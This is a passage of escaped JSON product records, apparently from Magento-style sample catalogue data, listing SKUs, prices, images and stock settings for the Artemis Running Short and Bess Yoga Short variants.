Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"artemis-running-short-31-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Green\"},\"1916\":{\"sku\":\"WSH04-31-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short-31-Orange\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"artemis-running-short-31-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Orange\"},\"1917\":{\"sku\":\"WSH04-32-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short-32-Black\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"artemis-running-short-32-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh04-black_alt1.jpg,\\/w\\/s\\/wsh04-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh04-black_alt1.jpg,\\/w\\/s\\/wsh04-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Black\"},\"1918\":{\"sku\":\"WSH04-32-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short-32-Green\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"artemis-running-short-32-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Green\"},\"1919\":{\"sku\":\"WSH04-32-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short-32-Orange\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"artemis-running-short-32-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Orange\"},\"1920\":{\"sku\":\"WSH04\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Artemis Running Short\",\"description\":\"<p>Discover smooth jogging and chic comfort each time you slip into the Artemis Running Short. A unique maritime-inspired design and oolor theme features a stretchy drawstring waist.<\\/p>\\n<p>&bull; Black rouched shorts with mint waist. <br \\/>&bull; Soft, lightweight construction.<br \\/>&bull; LumaTech&trade; wicking technology.<br \\/>&bull; Semi-fitted.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Basic,material=Spandex|Wool,pattern=Solid-Highlight,climate=All-weather|Indoor|Hot|Mild|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WSH04-28-Black,size=28,color=Black|sku=WSH04-28-Green,size=28,color=Green|sku=WSH04-28-Orange,size=28,color=Orange|sku=WSH04-29-Black,size=29,color=Black|sku=WSH04-29-Green,size=29,color=Green|sku=WSH04-29-Orange,size=29,color=Orange|sku=WSH04-30-Black,size=30,color=Black|sku=WSH04-30-Green,size=30,color=Green|sku=WSH04-30-Orange,size=30,color=Orange|sku=WSH04-31-Black,size=31,color=Black|sku=WSH04-31-Green,size=31,color=Green|sku=WSH04-31-Orange,size=31,color=Orange|sku=WSH04-32-Black,size=32,color=Black|sku=WSH04-32-Green,size=32,color=Green|sku=WSH04-32-Orange,size=32,color=Orange\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh04-black_alt1.jpg,\\/w\\/s\\/wsh04-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh04-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh04-black_alt1.jpg,\\/w\\/s\\/wsh04-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Basic\",\"material\":\"Spandex|Wool\",\"pattern\":\"Solid-Highlight\",\"climate\":\"All-weather|Indoor|Hot|Mild|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1921\":{\"sku\":\"WSH05-28-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short-28-Blue\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bess-yoga-short-28-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh05-blue_back.jpg\",\"image\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh05-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Blue\"},\"1922\":{\"sku\":\"WSH05-28-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short-28-Purple\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bess-yoga-short-28-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Purple\"},\"1923\":{\"sku\":\"WSH05-28-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Bess Yoga Short-28-Yellow\",\"description\":\"<p>Designed for intense physical activity &ndash; think bikram &ndash; our Bess Yoga Short features moisture-wicking, four-way stretch fabric that lets you move in every which way. A vented gusset adds breathability and range of motion.<\\/p>\\n<p>&bull; Navy cotton shorts with light bue waist detail.<br \\/>&bull; Front shirred waistband.<br \\/>&bull; Flat-lock, chafe-free side seams.<br \\/>&bull; Vented gusset.<br \\/>&bull; Hidden interior pocket.<br \\/>&bull; Sustainable and recycled fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"bess-yoga-short-28-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh05-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh05-yellow_m